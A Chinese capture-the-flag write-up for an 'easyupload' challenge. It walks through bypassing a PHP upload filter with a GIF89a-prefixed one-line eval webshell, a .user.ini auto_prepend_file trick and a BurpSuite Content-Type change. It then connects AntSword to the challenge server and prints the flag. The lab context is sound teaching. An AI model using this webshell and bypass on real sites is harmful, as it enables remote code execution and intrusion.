easyupload及BurpSuite抓包、改包、放包

简介: easyupload及BurpSuite抓包、改包、放包

很明显的文件上传题

如果你直接传一句话木马是不行的,无论是图片格式还是文本格式,都会被检测到

要么提示文件有问题

要么提示文件类型有问题

这里需要绕过

第一点


一句话木马里肯定不能有php字样, <?php @eval($_POST['1']);?> 这种是不行的


可以用这种  <?=eval($_REQUEST['cmd']);?>


第二点


在文件头部添加一个图片的文件头来绕过


合起来一句话木马内容就是


GIF89a

<?=eval($_REQUEST['cmd']);?>

 

将这个文本存为.jpg格式

第三点

这里还需要提前上传一个.user.ini文件

内容如下

GIF89a

auto_prepend_file=a.jpg

我们可以借助.user.ini让所有php文件都“自动”包含某个文件,这个文件可以是一个正常php文件,也可以是一个包含一句话木马的webshell。


OK,做好这三点后,我们需要先上传.user.ini文件,再上传a.jpg,最后用蚁剑或者菜刀去连接


我们可以看到直接上传.user.ini也是不行的

这里需要先用BurpSuite抓包,修改类型后再放包,便可上传成功

下面先简单介绍一下用BurpSuite进行简单的抓包、改包、放包

抓包:

在Proxy里点击Open browser

再将intercept打开(拦截请求包)

当我们访问这个网站时就会有反馈,这里先直接放,一直点击Foward就好


页面加载出来后,我们在这里上传刚才做好的.user.ini文件

改包:

将 Content-Type: application/octet-stream 修改为 Content-Type: image/jpg

放包:

修改后点击两次Foward放包,可以看到文件上传成功


接下来我们上传a.jpg,这个无论在哪里都可以直接上传

(建议用火狐浏览器,方便找到文件上传到哪里去了,这个路径问题很重要,路径没对一会儿用蚁剑连会提示返回值为空

上传成功

用F12打开调试器选择网络查看上传文件的地址 (如果是空白就点击重新载入)

这个地址真的很重要!!!不能用那个网站本身的网址,也不能用Referer的那个

正确地址   http://223.112.5.156:57370/uploads/index.php

错误地址   http://223.112.5.156:57370/index.php

最后就是用蚁剑或者菜刀来连接了

右键添加数据

蚁剑可以先测试一下连接

菜刀直接添加

都是在根目录下拉找到flag文件的

 

cyberpeace{9cf9f5742497791c16630fdf328ecf60}


下面是用错误地址的报错

 

目录
相关文章
|
数据采集 Web App开发 自然语言处理
|
7月前
|
安全 数据可视化 Java
BurpSuite
BurpSuite
221 7
|
7月前
BurpSuite2021 -- 抓包使用及设置
BurpSuite2021 -- 抓包使用及设置
144 1
|
7月前
charlesproxy抓包工具
charlesproxy抓包工具
52 1
|
7月前
|
Java
抓包工具 -- burpsuite(Repeater功能)
抓包工具 -- burpsuite(Repeater功能)
123 0
|
Web App开发 安全
Burpsuite+Proxifier抓取exe数据包
Burpsuite+Proxifier抓取exe数据包
291 0
|
JSON 缓存 数据格式
抓包工具简单介绍和 fiddler 安装
抓包工具,是个特殊的软件,相当于一个 “代理程序”,浏览器给服务器发的请求就会经过这个代理程序,进一步的就能分析出请求和响应的结果如何。
抓包工具简单介绍和 fiddler 安装
|
Web App开发 前端开发 安全
Fiddler抓包
Fiddler抓包
143 0
Fiddler抓包
|
JSON 前端开发 JavaScript
Fiddler抓包工具使用小技巧
Fiddler中有个AutoResponder页签,该页签可以实现前端js代码调试、mock接口等功能,从英文单词的意思翻译过来就是自动响应,通过配置一定的规则,在满足一定规则的情况下,自动给出指定的响应结果。
Fiddler抓包工具使用小技巧
|
网络安全 iOS开发 MacOS
Charles 抓包
Charles 抓包